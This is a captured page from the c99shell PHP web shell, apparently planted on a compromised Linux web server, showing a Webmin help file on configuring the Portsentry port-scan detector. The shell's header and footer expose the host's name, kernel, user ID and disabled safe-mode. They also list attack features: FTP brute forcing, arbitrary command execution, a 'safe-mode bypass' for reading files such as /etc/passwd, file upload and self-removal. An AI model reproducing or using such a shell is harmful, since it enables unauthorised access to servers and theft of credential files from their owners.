!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/usr/libexec/webmin/sentry/help/   drwxr-xr-x
Free 50.87 GB of 127.8 GB (39.81%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     portsentry.html (2.29 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
Portsentry Configuration
Portsentry is a program designed to detect and repond to port scans against a target host in real time. It can do this in two ways - by listening on a set of selected ports (basic mode), or by monitoring all ports below a choice number. When a connection on one of the monitored ports is detected, Portsentry records the event in the logs and optionally takes action to block all further traffic from the connecting host.

The options on this page are :

  • TCP ports to monitor
    When in basic mode, Portsentry will listen on all the TCP ports listed in the first line for this option. In advanced mode, it will listen on all ports below the number entered on the second line, excluding those listed in the 'except' field.

  • UDP ports to monitor
    Like the TCP ports option, but controls which UDP ports are monitored.

  • Block TCP probes
    This option controls what action Portsentry takes when it detects a TCP connection to one of the monitored ports. The choices are Yes (block future connections from the host), No (do nothing), or Run kill command (run a command specified in the config file). In all cases, the connection will be recorded in the system logs.

  • Block UDP probes
    Like the Block TCP probes option, but controls what happens when a UDP connection is detected.

  • Message for blocked connections
    When Portsentry is listening on a port, any connection received will have this message send back before the connection is closed.

  • Number of connections before triggering blocking
    The number of 'grace' connections that a host is allowed to make to a monitored port before the host is blocked. If this is set to zero, the first connection will trigger blocking.

  • Hosts to ignore traffic from
    The IP addresses, hostnames or IP address/netmasks of hosts and networks from which traffic is ignored.

At the bottom of the page is a button for either starting Portsentry (if it is not running), or stopping it (if it is running). Because Portsentry runs as a pair of background processes (or daemon), if it is not running no monitoring of port scans will be done.



:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0108 ]--